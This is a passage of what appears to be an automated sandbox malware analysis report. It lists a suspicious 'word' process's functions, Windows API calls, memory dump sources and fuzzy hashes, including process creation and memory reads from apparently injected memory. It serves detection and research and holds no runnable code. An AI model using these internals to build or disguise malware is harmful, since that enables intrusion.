                                                                            control_flow_graph 1398 40f5e0-40f62f call 40f580 call 413990 call 4112ef call 40f6a0 call 40f6d0 1409 40f631-40f653 1398->1409 1409->1409 1410 40f655-40f66d call 414e06 1409->1410 1413 40f673-40f67b call 40f450 1410->1413 1414 42b2ee 1410->1414 1416 42b2f8-42b322 call 4151b0 call 44afdc 1413->1416 1418 40f681-40f695 call 414e94 1413->1418 1414->1416 1425 42b324-42b330 1416->1425 1425->1425 1426 42b332-42b338 call 415484 1425->1426 1428 42b33d-42b343 1426->1428
                                                                            APIs
                                                                              • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                              • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                              • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                            • _strcat.LIBCMT ref: 0040F603
                                                                              • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                              • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                            • String ID: HH
                                                                            • API String ID: 1194219731-2761332787
                                                                            • Opcode ID: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
                                                                            • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                            • Opcode Fuzzy Hash: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
                                                                            • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                            Function 0040E1E0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0040E202
                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell__memset
                                                                            • String ID:
                                                                            • API String ID: 928536360-0
                                                                            • Opcode ID: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                            • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                            • Opcode Fuzzy Hash: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                            • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                            Function 0041171A Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 00411734
                                                                              • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                              • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                              • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                            • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1411284514-0
                                                                            • Opcode ID: f6d0f9ac01cc1593a24bd4fb6812cf372efb98f80d14d441c12493078b846558
                                                                            • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                            • Opcode Fuzzy Hash: f6d0f9ac01cc1593a24bd4fb6812cf372efb98f80d14d441c12493078b846558
                                                                            • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                            Function 004099A8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00409A61
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID: 0vH
                                                                            • API String ID: 1143807570-3662162768
                                                                            • Opcode ID: 91b6cb900ed417c533260d5c256813c8ee98ba88ee474f01c423a17eae430ae8
                                                                            • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                            • Opcode Fuzzy Hash: 91b6cb900ed417c533260d5c256813c8ee98ba88ee474f01c423a17eae430ae8
                                                                            • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                            Function 03A44418 Relevance: 5.2, APIs: 3, Instructions: 720processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(?,00000000), ref: 03A44BD3
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03A44C8B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429781740.0000000003A43000.00000040.00000020.00020000.00000000.sdmp, Offset: 03A43000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3a43000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CreateMemoryRead
                                                                            • String ID:
                                                                            • API String ID: 2726527582-0
                                                                            • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                            • Instruction ID: e40415d2150dc7d0357655e364a11f38f767509dedb081f8647c232c431ec942
                                                                            • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                            • Instruction Fuzzy Hash: 86620B30A14618DBEB24CFA4C841BEEB376EF98700F1091A9D10DEB394E7759E81CB59
                                                                            Function 004734B7 Relevance: 4.7, APIs: 3, Instructions: 234COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                            • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                            • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                            • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                            Function 0040D7F0 Relevance: 4.6, APIs: 3, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _set_new_mode.LIBCMT ref: 0040D88C
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,001B2EB8), ref: 0040D8B9
                                                                            • FreeLibrary.KERNEL32(?), ref: 0040D8CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FreeInfoLibraryParametersSystem_set_new_mode
                                                                            • String ID:
                                                                            • API String ID: 1188159508-0
                                                                            • Opcode ID: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                            • Instruction ID: 2b4412acdce639bfbf0f9e0c9ecf3f694f94d165ded01d265c3c64edb54a61d9
                                                                            • Opcode Fuzzy Hash: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                            • Instruction Fuzzy Hash: C2215EB19183009FC700EF56D88150ABBE4FB98354F44497EF849A72A2D735A945CB9A
                                                                            Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32 ref: 0040F132
                                                                            • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,80000001,80000001), ref: 0040F14F
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040F159
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                            • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                            • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                            • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                            Function 0043526E Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 00435278
                                                                              • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                              • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                              • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                            • _malloc.LIBCMT ref: 00435288
                                                                            • _malloc.LIBCMT ref: 00435298
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _malloc$AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 680241177-0
                                                                            • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                            • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                            • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                            • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                            Function 00411AC6 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __lock.LIBCMT ref: 00411ACE
                                                                              • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                              • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                              • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                            • __decode_pointer.LIBCMT ref: 00411AD9
                                                                              • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 004169FB
                                                                              • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00000003,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A12
                                                                              • Part of subcall function 004169E9: RtlDecodePointer.NTDLL(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A50
                                                                            • __encode_pointer.LIBCMT ref: 00411AE3
                                                                              • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416980
                                                                              • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000003,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416997
                                                                              • Part of subcall function 0041696E: RtlEncodePointer.NTDLL(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 004169D5
                                                                              • Part of subcall function 0041832D: LeaveCriticalSection.KERNEL32(?,00413AE5,00000004,00413AD3,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004), ref: 0041833C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Value$CriticalPointerSection$DecodeEncodeEnterLeave__amsg_exit__decode_pointer__encode_pointer__lock__mtinitlocknum
                                                                            • String ID:
                                                                            • API String ID: 741361212-0
                                                                            • Opcode ID: edb43eca56ef027ac361edaff2b5e89f00094b9356cce8bc8a346a0e55979942
                                                                            • Instruction ID: 38d776d816f70f727deb20f5ce19c96205530670ca88b6e54865c94596e56b2a
                                                                            • Opcode Fuzzy Hash: edb43eca56ef027ac361edaff2b5e89f00094b9356cce8bc8a346a0e55979942
                                                                            • Instruction Fuzzy Hash: B9D05EB1A00318B7CA0037E69C07ADA3E45CB407A8F0604BFFB0857252ED3AC85082DD
                                                                            Function 00401B70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00401B71
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID: @EXITCODE
                                                                            • API String ID: 580348202-3436989551
                                                                            • Opcode ID: 6cf3cde66a08f965a4344bc1fc3281b19b19243cf66827a1cf885af4ed451a9e
                                                                            • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                            • Opcode Fuzzy Hash: 6cf3cde66a08f965a4344bc1fc3281b19b19243cf66827a1cf885af4ed451a9e
                                                                            • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                            Function 0040B380 Relevance: 3.3, APIs: 2, Instructions: 255COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 2e6ad9008194001af4a6ffaf6d5577c9fc0db539bc07221a9f788acfd60c8b7c
                                                                            • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                            • Opcode Fuzzy Hash: 2e6ad9008194001af4a6ffaf6d5577c9fc0db539bc07221a9f788acfd60c8b7c
                                                                            • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                            Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040F00A
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000), ref: 004299D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                            • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                            • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                            • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                            Function 0041511A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __lock_file_memset
                                                                            • String ID:
                                                                            • API String ID: 26237723-0
                                                                            • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                            • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                            • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                            • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                            Function 00414E94 Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                            • __lock_file.LIBCMT ref: 00414EE4
                                                                              • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                            • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                            • String ID:
                                                                            • API String ID: 717694121-0
                                                                            • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                            • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                            • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                            • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                            Function 0040F370 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
